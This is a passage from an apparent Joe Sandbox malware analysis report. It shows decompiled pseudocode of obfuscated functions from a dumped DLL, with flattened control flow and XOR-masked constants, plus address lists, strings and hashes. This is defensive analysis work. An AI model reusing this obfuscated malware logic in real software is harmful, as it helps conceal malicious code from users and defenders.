				_t240 = 0x4b;
				_v1128 = _v1128 * 0xa;
				_v1128 = _v1128 << 1;
				_v1128 = _v1128 << 9;
				_v1128 = _v1128 ^ 0x1f99ed7d;
				_v1088 = 0xf1f3;
				_v1088 = _v1088 + 0x83;
				_v1088 = _v1088 << 0xf;
				_v1088 = _v1088 ^ 0x793b4332;
				_v1072 = 0xc19e;
				_v1072 = _v1072 / _t240;
				_v1072 = _v1072 ^ 0x00000807;
				_v1096 = 0x5df5;
				_t241 = 0x65;
				_v1096 = _v1096 / _t241;
				_v1096 = _v1096 + 0xb24c;
				_v1096 = _v1096 ^ 0x0000928e;
				_v1124 = 0x49f0;
				_v1124 = _v1124 + 0x7719;
				_v1124 = _v1124 << 0xb;
				_v1124 = _v1124 ^ 0x0608131f;
				do {
					while(_t217 != 0xcdcbb46) {
						if(_t217 == 0xe5d9d0e) {
							_t206 = E1001CBE7( &_v520, _v1112, __eflags, _v1120, _v1128,  &_v1040);
							_t244 =  &(_t244[3]);
							__eflags = _t206;
							_t238 =  !=  ? 1 : _t238;
							_t217 = 0x23d64a19;
							continue;
						} else {
							if(_t217 == 0xe97c3dd) {
								_push(_t217);
								E1000DFD8(_v1080,  &_v520, __eflags, _v1136, _v1092);
								_t244 =  &(_t244[3]);
								_t217 = 0x3342c16f;
								continue;
							} else {
								if(_t217 == 0x23d64a19) {
									E100147B5(_v1088,  &_v1040, _v1072, _v1096, _v1124);
								} else {
									_t251 = _t217 - 0x3342c16f;
									if(_t217 != 0x3342c16f) {
										goto L10;
									} else {
										_push(0x100012d8);
										_push(_v1140);
										_push(_v1084);
										_t210 = E10005DFC(_v1064, _v1076, _t251);
										_t175 =  &_v1116; // 0x793b4332
										E1000A4D7(_t251, _v1108, _v1100,  *_t175, _v1104, _t210,  *0x10021088 + 0x254,  &_v1040,  *0x10021088 + 0x38);
										E10010D6D(_v1144, _v1132, _v1060, _t210);
										_t244 =  &(_t244[0xd]);
										_t217 = 0xe5d9d0e;
										continue;
									}
								}
							}
						}
						L13:
						return _t238;
					}
					_t217 = 0xe97c3dd;
					L10:
					__eflags = _t217 - 0x1b50eba4;
				} while (__eflags != 0);
				goto L13;
			}

0x1000d2dd
0x1000d2e3
0x1000d2ed
0x1000d2f5
0x1000d2fa
0x1000d306
0x1000d308
0x1000d30c
0x1000d31a
0x1000d31d
0x1000d321
0x1000d329
0x1000d331
0x1000d336
0x1000d33b
0x1000d343
0x1000d34b
0x1000d353
0x1000d35b
0x1000d360
0x1000d368
0x1000d370
0x1000d378
0x1000d380
0x1000d388
0x1000d390
0x1000d398
0x1000d3a0
0x1000d3a5
0x1000d3ad
0x1000d3b5
0x1000d3bd
0x1000d3c5
0x1000d3cd
0x1000d3d5
0x1000d3dd
0x1000d3e5
0x1000d3ed
0x1000d3f5
0x1000d402
0x1000d406
0x1000d40e
0x1000d416
0x1000d41e
0x1000d423
0x1000d42b
0x1000d433
0x1000d440
0x1000d444
0x1000d44c
0x1000d454
0x1000d45c
0x1000d464
0x1000d46c
0x1000d474
0x1000d47c
0x1000d484
0x1000d48c
0x1000d494
0x1000d49c
0x1000d4a1
0x1000d4a6
0x1000d4ae
0x1000d4b6
0x1000d4be
0x1000d4c6
0x1000d4ce
0x1000d4d6
0x1000d4de
0x1000d4e6
0x1000d4ee
0x1000d4f6
0x1000d4fe
0x1000d508
0x1000d515
0x1000d529
0x1000d52c
0x1000d530
0x1000d534
0x1000d539
0x1000d541
0x1000d549
0x1000d551
0x1000d556
0x1000d55e
0x1000d56e
0x1000d572
0x1000d57a
0x1000d586
0x1000d589
0x1000d58d
0x1000d595
0x1000d59d
0x1000d5a5
0x1000d5ad
0x1000d5b2
0x1000d5ba
0x1000d5ba
0x1000d5cc
0x1000d69d
0x1000d6a4
0x1000d6a8
0x1000d6aa
0x1000d6ad
0x00000000
0x1000d5d2
0x1000d5d4
0x1000d662
0x1000d676
0x1000d67b
0x1000d67e
0x00000000
0x1000d5da
0x1000d5e0
0x1000d6db
0x1000d5e6
0x1000d5e6
0x1000d5e8
0x00000000
0x1000d5ee
0x1000d5ee
0x1000d5f3
0x1000d5f7
0x1000d603
0x1000d628
0x1000d63b
0x1000d650
0x1000d655
0x1000d658
0x00000000
0x1000d658
0x1000d5e8
0x1000d5e0
0x1000d5d4
0x1000d6e3
0x1000d6ef
0x1000d6ef
0x1000d6b7
0x1000d6b9
0x1000d6b9
0x1000d6b9
0x00000000

Strings

5u, xrefs: 1000D4CE
2C;y, xrefs: 1000D628
b^, xrefs: 1000D484
E:, xrefs: 1000D380

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 2C;y$5u$E:$b^
API String ID: 0-4114578400
Opcode ID: bbec60b677c264def03e0f4c088f39cd271cc5ae294ba4fe3014cd97280a2f92
Instruction ID: cd4b4bf40699cc70a084c40d27999f3341466a0c0ccca48fa0823e2d0a8d7b4e
Opcode Fuzzy Hash: bbec60b677c264def03e0f4c088f39cd271cc5ae294ba4fe3014cd97280a2f92
Instruction Fuzzy Hash: 9DA121715083819FE354CF62C58A45FBBE1FBC4748F40491DF29A86264C7BA9A08CF47

Uniqueness

Uniqueness Score: -1.00%

Function 1000BE74 Relevance: 5.2, Strings: 4, Instructions: 168
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E1000BE74(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void* _t140;
				void* _t156;
				void* _t157;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				void* _t171;
				void* _t195;
				void* _t196;
				signed int* _t199;

				_push(_a8);
				_t195 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10012550(_t140);
				_v108 = 0xfc4f;
				_t199 =  &(( &_v116)[4]);
				_v108 = _v108 | 0x4da9a639;
				_v108 = _v108 + 0x67dc;
				_t196 = 0;
				_v108 = _v108 << 0xc;
				_t171 = 0x2e363e63;
				_v108 = _v108 ^ 0xa6659d9d;
				_v72 = 0xf402;
				_v72 = _v72 ^ 0x5f9ae956;
				_v72 = _v72 ^ 0x5f9a291f;
				_v112 = 0xe152;
				_v112 = _v112 | 0xaffcdffa;
				_t163 = 0x1d;
				_v112 = _v112 / _t163;
				_v112 = _v112 ^ 0x0611b87a;
				_v116 = 0x6c25;
				_v116 = _v116 ^ 0x0c91b378;
				_v116 = _v116 + 0x2f8;
				_v116 = _v116 | 0x69d7e26c;
				_v116 = _v116 ^ 0x6dd79b31;
				_v104 = 0x7ef1;
				_v104 = _v104 + 0xffff4bb2;
				_t164 = 0x4f;
				_v104 = _v104 / _t164;
				_t165 = 0x4d;
				_v104 = _v104 / _t165;
				_v104 = _v104 ^ 0x000acb92;
				_v88 = 0xf338;
				_t166 = 0x31;
				_v88 = _v88 / _t166;
				_v88 = _v88 >> 7;
				_v88 = _v88 ^ 0x00001bb8;
				_v100 = 0x39ac;
				_v100 = _v100 >> 5;
				_t167 = 0x6a;
				_v100 = _v100 * 0x73;
				_v100 = _v100 + 0xffffcfed;
				_v100 = _v100 ^ 0x0000c292;
				_v84 = 0xa231;
				_v84 = _v84 + 0x99eb;
				_v84 = _v84 / _t167;
				_v84 = _v84 ^ 0x000046d3;
				_v76 = 0xf128;
				_v76 = _v76 + 0xffff9193;
				_v76 = _v76 >> 9;
				_v76 = _v76 ^ 0x00001e23;
				_v92 = 0x62a3;
				_t168 = 0x33;
				_v92 = _v92 / _t168;
				_v92 = _v92 ^ 0x5bc1cdff;
				_v92 = _v92 + 0xffff8115;
				_v92 = _v92 ^ 0x5bc105bf;
				_v80 = 0x9d4f;
				_v80 = _v80 << 0xf;
				_v80 = _v80 + 0xffff2359;
				_v80 = _v80 ^ 0x4ea6cb3e;
				_v96 = 0x4976;
				_v96 = _v96 + 0x63d7;
				_v96 = _v96 + 0xf4f6;
				_v96 = _v96 + 0xffffaa83;
				_v96 = _v96 ^ 0x00013bfc;
				do {
					while(_t171 != 0xc31af3f) {
						if(_t171 == 0x1ee6df64) {
							_t157 = E1000BAA2( &_v68, _v104, _v88, _t195);
							_t199 =  &(_t199[2]);
							__eflags = _t157;
							if(__eflags != 0) {
								_t171 = 0xc31af3f;
								continue;
							}
						} else {
							if(_t171 == 0x1ee95fdc) {
								E1000FEE3(_a8,  &_v68, _v108, _v72, _v112, _v116);
								_t199 =  &(_t199[4]);
								_t171 = 0x1ee6df64;
								continue;
							} else {
								if(_t171 == 0x2c795783) {
									_t136 = _t195 + 8; // 0x301e42
									__eflags = E1000F914(_v76, _v92, __eflags, _v80, _t136, _v96,  &_v68);
									_t196 =  !=  ? 1 : _t196;
								} else {
									if(_t171 != 0x2e363e63) {
										goto L13;
									} else {
										_t171 = 0x1ee95fdc;
										continue;
									}
								}
							}
						}
						L16:
						return _t196;
					}
					_t130 = _t195 + 4; // 0x301e3e
					_t156 = E1000BAA2( &_v68, _v100, _v84, _t130);
					_t199 =  &(_t199[2]);
					__eflags = _t156;
					if(__eflags == 0) {
						_t171 = 0x26c6c5b0;
						goto L13;
					} else {
						_t171 = 0x2c795783;
						continue;
					}
					goto L16;
					L13:
					__eflags = _t171 - 0x26c6c5b0;
				} while (__eflags != 0);
				goto L16;
			}

0x1000be7b
0x1000be82
0x1000be84
0x1000be8b
0x1000be8c
0x1000be8d
0x1000be92
0x1000be9a
0x1000be9d
0x1000bea7
0x1000beaf
0x1000beb1
0x1000beb6
0x1000bebb
0x1000bec3
0x1000becb
0x1000bed3
0x1000bedb
0x1000bee3
0x1000bef1
0x1000bef6
0x1000befc
0x1000bf04
0x1000bf0c
0x1000bf14
0x1000bf1c
0x1000bf24
0x1000bf2c
0x1000bf34
0x1000bf40
0x1000bf45
0x1000bf4f
0x1000bf54
0x1000bf5a
0x1000bf62
0x1000bf6e
0x1000bf73
0x1000bf79
0x1000bf7e
0x1000bf86
0x1000bf8e
0x1000bf98
0x1000bf99
0x1000bf9d
0x1000bfa5
0x1000bfad
0x1000bfb5
0x1000bfc3
0x1000bfc7
0x1000bfcf
0x1000bfd7
0x1000bfdf
0x1000bfe4
0x1000bfee
0x1000bffc
0x1000c009
0x1000c00d
0x1000c015
0x1000c01d
0x1000c025
0x1000c02d
0x1000c032
0x1000c03a
0x1000c042
0x1000c04a
0x1000c052
0x1000c05a
0x1000c062
0x1000c06a
0x1000c06a
0x1000c074
0x1000c0c9
0x1000c0ce
0x1000c0d1
0x1000c0d3
0x1000c0d5
0x00000000
0x1000c0d5
0x1000c076
0x1000c078
0x1000c0ad
0x1000c0b2
0x1000c0b5
0x00000000
0x1000c07a
0x1000c080
0x1000c11b
0x1000c136
0x1000c138
0x1000c086
0x1000c08c
0x00000000
0x1000c08e
0x1000c08e
0x00000000
0x1000c08e
0x1000c08c
0x1000c080
0x1000c078
0x1000c13c
0x1000c144
0x1000c144
0x1000c0d9
0x1000c0e9
0x1000c0ee
0x1000c0f1
0x1000c0f3
0x1000c0ff
0x00000000
0x1000c0f5
0x1000c0f5
0x00000000
0x1000c0f5
0x00000000
0x1000c104
0x1000c104
0x1000c104
0x00000000

Strings

c>6., xrefs: 1000C086
c>6., xrefs: 1000BEB6
vI, xrefs: 1000C042
%l, xrefs: 1000BF04

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: %l$c>6.$c>6.$vI
API String ID: 0-1842334051
Opcode ID: e35383a8ff9d3873cfa8fad072e536b5cf3e084f98ebf9b090aa7fc1caa2cc9a
Instruction ID: 682dac169000726c4e25c5c7aa4f02aa7a95b6b2864d0ba5fa73f3b818711956
Opcode Fuzzy Hash: e35383a8ff9d3873cfa8fad072e536b5cf3e084f98ebf9b090aa7fc1caa2cc9a
Instruction Fuzzy Hash: A871B972108341DBE394CF21C88581FBBE1FBD8798F500A2CF58A962A0D376CA19CB47

Uniqueness

Uniqueness Score: -1.00%

Function 10011090 Relevance: 5.2, Strings: 4, Instructions: 168
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E10011090(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				void* _t140;
				void* _t158;
				intOrPtr* _t165;
				void* _t167;
				void* _t183;
				void* _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				signed int _t189;
				signed int* _t192;

				_t165 = _a4;
				_push(_a8);
				_t183 = __ecx;
				_push(_t165);
				_push(__edx);
				_push(__ecx);
				E10012550(_t140);
				_v8 = 0x6f9ade;
				_t184 = 0;
				_v4 = _v4 & 0;
				_t192 =  &(( &_v68)[4]);
				_v44 = 0x982a;
				_v44 = _v44 + 0xbc31;
				_t167 = 0x2bf8d881;
				_v44 = _v44 | 0xf90c86f7;
				_v44 = _v44 ^ 0xf90dd6fe;
				_v28 = 0x630d;
				_t185 = 0x43;
				_v28 = _v28 * 0x4e;
				_v28 = _v28 ^ 0x001e2df7;
				_v56 = 0x19d0;
				_v56 = _v56 * 0x38;
				_v56 = _v56 + 0x1bd7;
				_v56 = _v56 ^ 0x4b810ed7;
				_v56 = _v56 ^ 0x4b84d952;
				_v32 = 0xc9e1;
				_v32 = _v32 + 0xabf9;
				_v32 = _v32 ^ 0x000119f3;
				_v36 = 0x329d;
				_v36 = _v36 >> 1;
				_v36 = _v36 ^ 0x00004114;
				_v60 = 0xf614;
				_v60 = _v60 / _t185;
				_t186 = 0x78;
				_v60 = _v60 * 0x44;
				_v60 = _v60 + 0xe907;
				_v60 = _v60 ^ 0x0001d7a4;
				_v48 = 0xee3;
				_v48 = _v48 * 0x48;
				_v48 = _v48 ^ 0xc9a4a55a;
				_v48 = _v48 ^ 0xc9a0a1d8;
				_v64 = 0x7fce;
				_v64 = _v64 / _t186;
				_t187 = 0x11;
				_v64 = _v64 / _t187;
				_v64 = _v64 >> 6;
				_v64 = _v64 ^ 0x000063f0;
				_v68 = 0xa533;
				_t188 = 0x65;
				_v68 = _v68 / _t188;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 * 0x3c;
				_v68 = _v68 ^ 0x000027f2;
				_v16 = 0x6517;
				_v16 = _v16 * 0x61;
				_v16 = _v16 ^ 0x00262f84;
				_v20 = 0xf07;
				_v20 = _v20 + 0xffffaba9;
				_v20 = _v20 ^ 0xffffe5ca;
				_v24 = 0x4d0a;
				_v24 = _v24 << 0xe;
				_v24 = _v24 ^ 0x1342cb05;
				_v40 = 0xdf77;
				_v40 = _v40 >> 2;
				_v40 = _v40 + 0xffffea10;
				_v40 = _v40 ^ 0x0000626b;
				_v52 = 0xc020;
				_v52 = _v52 | 0x928f446b;
				_t189 = 0x74;
				_v52 = _v52 / _t189;
				_v52 = _v52 | 0x14dbb019;
				_v52 = _v52 ^ 0x15dbc5e6;
				do {
					while(_t167 != 0x94f4759) {
						if(_t167 == 0xc9fc140) {
							_push(_t167);
							_t184 = E100054FB(_v12);
							if(_t184 != 0) {
								_t167 = 0x38319c56;
								continue;
							}
						} else {
							if(_t167 == 0x2bf8d881) {
								_t167 = 0x94f4759;
								continue;
							} else {
								if(_t167 != 0x38319c56) {
									goto L13;
								} else {
									E10009C40( &_v12, _v16, _t183, _v20, _v24, _t167, _v28, _v40, _t184, _t167, _v52);
									 *_t165 = _v12;
								}
							}
						}
						L6:
						return _t184;
					}
					_t158 = E10009C40( &_v12, _v56, _t183, _v32, _v36, _t167, _v44, _v60, 0, _t167, _v48);
					_t192 =  &(_t192[0xa]);
					if(_t158 == 0) {
						_t167 = 0x2cce3dbc;
						goto L13;
					} else {
						_t167 = 0xc9fc140;
						continue;
					}
					goto L6;
					L13:
				} while (_t167 != 0x2cce3dbc);
				goto L6;
			}

0x10011094
0x1001109b
0x1001109f
0x100110a1
0x100110a2
0x100110a3
0x100110a4
0x100110a9
0x100110b1
0x100110b3
0x100110b7
0x100110ba
0x100110c4
0x100110cc
0x100110d1
0x100110d9
0x100110e1
0x100110f0
0x100110f3
0x100110f7
0x100110ff
0x1001110c
0x10011110
0x10011118
0x10011120
0x10011128
0x10011130
0x10011138
0x10011140
0x10011148
0x1001114c
0x10011154
0x10011164
0x1001116d
0x10011170
0x10011174
0x1001117c
0x10011184
0x10011191
0x10011195
0x1001119d
0x100111a5
0x100111b5
0x100111bd
0x100111c2
0x100111c8
0x100111cd
0x100111d5
0x100111e1
0x100111e4
0x100111e8
0x100111f2
0x100111f6
0x100111fe
0x1001120b
0x1001120f
0x10011219
0x10011221
0x10011229
0x10011231
0x10011239
0x1001123e
0x10011246
0x1001124e
0x10011253
0x1001125b
0x10011263
0x1001126b
0x10011279
0x10011281
0x10011285
0x1001128d
0x10011295
0x10011295
0x1001129f
0x100112fd
0x10011303
0x10011308
0x1001130a
0x00000000
0x1001130a
0x100112a1
0x100112a7
0x100112ed
0x00000000
0x100112a9
0x100112af
0x00000000
0x100112b5
0x100112d5
0x100112e1
0x100112e1
0x100112af
0x100112a7
0x100112e4
0x100112ec
0x100112ec
0x10011332
0x10011337
0x1001133c
0x10011348
0x00000000
0x1001133e
0x1001133e
0x00000000
0x1001133e
0x00000000
0x1001134d
0x1001134d
0x00000000

Strings

M, xrefs: 10011231
YGO, xrefs: 1001127C
c, xrefs: 100110E1
kb, xrefs: 1001125B

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: M$c$YGO$kb
API String ID: 0-1506048532
Opcode ID: 5d4ebc2505cff4899b4b22ae4471b08fad847f46fa3111b0232cb516bf6688a7
Instruction ID: b0fc2312709209f7af51e0a2fddd3c8f370a49b30c5a9f27a62458f176e120a6
Opcode Fuzzy Hash: 5d4ebc2505cff4899b4b22ae4471b08fad847f46fa3111b0232cb516bf6688a7
Instruction Fuzzy Hash: 927163B15083819FD348CF65C88995FBBF1FBC5788F404A1DF1859A260D3BACA598B46

Uniqueness

Uniqueness Score: -1.00%

Function 1000A2D2 Relevance: 5.1, Strings: 4, Instructions: 121
COMMONCrypto

Download Yara Rule

C-Code - Quality: 47%

			E1000A2D2() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t100;
				intOrPtr _t105;
				intOrPtr _t106;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t113;
				signed int _t121;
				void* _t124;
				signed int* _t126;

				_t126 =  &_v36;
				_v32 = 0x28a4;
				_t110 = 0x7a;
				_v32 = _v32 / _t110;
				_v32 = _v32 + 0x1ce1;
				_t124 = 0x1fa14ba;
				_t111 = 0x6a;
				_v32 = _v32 * 0x39;
				_v32 = _v32 ^ 0x0006d499;
				_v36 = 0xda62;
				_v36 = _v36 | 0x19bfccda;
				_v36 = _v36 * 0x11;
				_v36 = _v36 + 0xffffda64;
				_v36 = _v36 ^ 0xb5bd9561;
				_v16 = 0xf5e2;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0xb4169af8;
				_v16 = _v16 ^ 0xb7c16fee;
				_v8 = 0x3ff4;
				_v8 = _v8 + 0xed72;
				_v8 = _v8 ^ 0x000177ac;
				_v20 = 0x623c;
				_v20 = _v20 * 0x56;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x0010aba0;
				_v4 = 0xa056;
				_v4 = _v4 + 0x9c16;
				_v4 = _v4 ^ 0x00012145;
				_v12 = 0xa565;
				_v12 = _v12 / _t111;
				_v12 = _v12 + 0xb62d;
				_v12 = _v12 ^ 0x0000fb40;
				_v24 = 0x4678;
				_v24 = _v24 + 0x5e74;
				_v24 = _v24 ^ 0x342f7ead;
				_v24 = _v24 | 0x89ec9c0a;
				_v24 = _v24 ^ 0xbdefbaa2;
				_v28 = 0x6d4f;
				_v28 = _v28 + 0xbb4f;
				_v28 = _v28 ^ 0x81aeaea9;
				_t100 = _v28;
				_t112 = 0x2b;
				_t121 = _t100 % _t112;
				_v28 = _t100 / _t112;
				_v28 = _v28 ^ 0x03044831;
				_t113 =  *0x10021090;
				do {
					while(_t124 != 0x1fa14ba) {
						if(_t124 == 0x9354c13) {
							_push(_t113);
							_t105 = E1000A1FE(_t113, _t121, _v16, _t113, _v8, _v20);
							_t113 =  *0x10021090;
							_t126 =  &(_t126[5]);
							_t124 = 0x2ac5a631;
							 *((intOrPtr*)(_t113 + 0x1c)) = _t105;
							continue;
						} else {
							if(_t124 != 0x2ac5a631) {
								goto L10;
							} else {
								_push(E10018C2B);
								_push(_v28);
								_push(_t113);
								_push(_v24);
								_push(_v12);
								_t106 = E1000903E(0, _v4);
								_t113 =  *0x10021090;
								 *((intOrPtr*)(_t113 + 0x18)) = _t106;
							}
						}
						L5:
						return 0 | _t113 != 0x00000000;
					}
					_push(_t113);
					_t121 = 0x2c;
					_t113 = E100054FB(_t121);
					 *0x10021090 = _t113;
					if(_t113 == 0) {
						_t124 = 0x380d3f8a;
						goto L10;
					} else {
						_t124 = 0x9354c13;
						continue;
					}
					goto L5;
					L10:
				} while (_t124 != 0x380d3f8a);
				goto L5;
			}

0x1000a2d2
0x1000a2d5
0x1000a2e9
0x1000a2ee
0x1000a2f4
0x1000a2fc
0x1000a30b
0x1000a318
0x1000a31c
0x1000a324
0x1000a32c
0x1000a339
0x1000a33d
0x1000a345
0x1000a34d
0x1000a355
0x1000a35a
0x1000a362
0x1000a36a
0x1000a372
0x1000a37a
0x1000a382
0x1000a38f
0x1000a393
0x1000a397
0x1000a39f
0x1000a3a7
0x1000a3af
0x1000a3b7
0x1000a3c7
0x1000a3cb
0x1000a3d3
0x1000a3db
0x1000a3e3
0x1000a3eb
0x1000a3f3
0x1000a3fb
0x1000a403
0x1000a40b
0x1000a413
0x1000a41b
0x1000a41f
0x1000a420
0x1000a422
0x1000a426
0x1000a42e
0x1000a434
0x1000a434
0x1000a43e
0x1000a483
0x1000a491
0x1000a496
0x1000a49c
0x1000a49f
0x1000a4a1
0x00000000
0x1000a440
0x1000a442
0x00000000
0x1000a448
0x1000a448
0x1000a450
0x1000a454
0x1000a455
0x1000a45b
0x1000a463
0x1000a468
0x1000a471
0x1000a471
0x1000a442
0x1000a475
0x1000a482
0x1000a482
0x1000a4ae
0x1000a4b1
0x1000a4b8
0x1000a4ba
0x1000a4c2
0x1000a4cb
0x00000000
0x1000a4c4
0x1000a4c4
0x00000000
0x1000a4c4
0x00000000
0x1000a4cd
0x1000a4cd
0x00000000

Strings

t^, xrefs: 1000A3E3
<b, xrefs: 1000A382
Om, xrefs: 1000A403
r, xrefs: 1000A372

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: <b$Om$r$t^
API String ID: 0-3331589388
Opcode ID: ad4de06f0d9a924785fa1e6bc7105a8df5e5e7162f71bd7a00b5666e34d2a47b
Instruction ID: 6be65feea01bc2d5e981ed40b01f288f750c5cfdc2af4e064c2701c3dc0c3c5a
Opcode Fuzzy Hash: ad4de06f0d9a924785fa1e6bc7105a8df5e5e7162f71bd7a00b5666e34d2a47b
Instruction Fuzzy Hash: 1F5199B15093019FE348CF25D58A80BBBE1FBC4758F504A2DF489561A0D3B9CE8A8F86

Uniqueness

Uniqueness Score: -1.00%

Function 10009D2F Relevance: 3.9, Strings: 3, Instructions: 197
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10009D2F(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr* _t178;
				intOrPtr _t188;
				intOrPtr _t189;
				signed int _t191;
				intOrPtr _t195;
				intOrPtr _t196;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				intOrPtr _t219;
				void* _t221;
				signed int _t222;
				intOrPtr _t223;
				intOrPtr _t224;
				signed int* _t225;

				_t189 = __ecx;
				_t225 =  &_v84;
				_v8 = __edx;
				_v24 = __ecx;
				_v84 = 0x52c3;
				_v84 = _v84 + 0xffffa290;
				_t221 = 0x1b1ec7af;
				_v20 = _v20 & 0x00000000;
				_t215 = 0x28;
				_v84 = _v84 / _t215;
				_v84 = _v84 ^ 0xc70a2cbb;
				_v84 = _v84 ^ 0xc16c29fd;
				_v60 = 0xef49;
				_t216 = 0x4f;
				_v60 = _v60 / _t216;
				_v60 = _v60 + 0x8f43;
				_v60 = _v60 ^ 0x0000e631;
				_v52 = 0xdf8d;
				_v52 = _v52 | 0x89b2267c;
				_v52 = _v52 ^ 0x13e61697;
				_v52 = _v52 ^ 0x9a54c391;
				_v80 = 0xa7ea;
				_v80 = _v80 >> 2;
				_v80 = _v80 + 0xffff1a0f;
				_v80 = _v80 ^ 0xf694800b;
				_v80 = _v80 ^ 0x096bf198;
				_v56 = 0x4df7;
				_t217 = 0x58;
				_v56 = _v56 * 0x24;
				_v56 = _v56 >> 0x10;
				_v56 = _v56 ^ 0x00005064;
				_v44 = 0x5793;
				_v44 = _v44 << 3;
				_v44 = _v44 | 0x1a78ccf0;
				_v44 = _v44 ^ 0x1a7ad28a;
				_v48 = 0x4fde;
				_v48 = _v48 / _t217;
				_v48 = _v48 * 0x14;
				_v48 = _v48 ^ 0x0000583a;
				_v32 = 0x8af0;
				_v32 = _v32 + 0xffff32af;
				_v32 = _v32 ^ 0xffffb04c;
				_v36 = 0x75dd;
				_v36 = _v36 + 0x1ee0;
				_v36 = _v36 ^ 0x0000d042;
				_v72 = 0x8173;
				_v72 = _v72 ^ 0xf613a128;
				_v72 = _v72 >> 0xb;
				_v72 = _v72 | 0xdda636e2;
				_v72 = _v72 ^ 0xddbe8dc6;
				_v76 = 0xe20a;
				_v76 = _v76 * 0x6c;
				_v76 = _v76 << 0xc;
				_v76 = _v76 >> 0x10;
				_v76 = _v76 ^ 0x0000f2d9;
				_v64 = 0x5aba;
				_v64 = _v64 << 5;
				_v64 = _v64 ^ 0x995ec148;
				_v64 = _v64 + 0xffffc53f;
				_v64 = _v64 ^ 0x9955459c;
				_v68 = 0xe247;
				_v68 = _v68 ^ 0xa76713ca;
				_t218 = 0x3b;
				_t224 = _v8;
				_t219 = _v4;
				_t188 = _v8;
				_v68 = _v68 / _t218;
				_v68 = _v68 >> 8;
				_v68 = _v68 ^ 0x0002c308;
				_v40 = 0xd4fd;
				_v40 = _v40 * 0x1a;
				_v40 = _v40 ^ 0x6afb2fbd;
				_v40 = _v40 ^ 0x6aee8e0f;
				_t174 = _v28;
				L1:
				while(1) {
					do {
						while(_t221 != 0x145613b1) {
							if(_t221 == 0x146a35d3) {
								_t219 = 0x10000;
								_push(_t189);
								_t174 = E100054FB(0x10000);
								_t188 = _t174;
								if(_t188 != 0) {
									_v28 = _t174;
									_t224 = 0x10000;
									L7:
									_t189 = _v24;
									_t221 = 0x145613b1;
									continue;
								}
							} else {
								if(_t221 != 0x1b1ec7af) {
									goto L15;
								} else {
									_t221 = 0x146a35d3;
									continue;
								}
							}
							goto L16;
						}
						_t191 = E100134DA(_v52,  &_v16, _v80, _v56, _t224, _t174, _t189);
						_t225 =  &(_t225[5]);
						_v20 = _t191;
						if(_t191 == 0) {
							L14:
							_t189 = _v24;
							_t221 = 0x2a69df6d;
							goto L15;
						} else {
							_t195 = _v16;
							if(_t195 == 0) {
								goto L14;
							} else {
								_t174 = _v28 + _t195;
								_v28 = _v28 + _t195;
								_t224 = _t224 - _t195;
								if(_t224 != 0) {
									goto L7;
								} else {
									_t196 = _t219 + _t219;
									_push(_t196);
									_v12 = _t196;
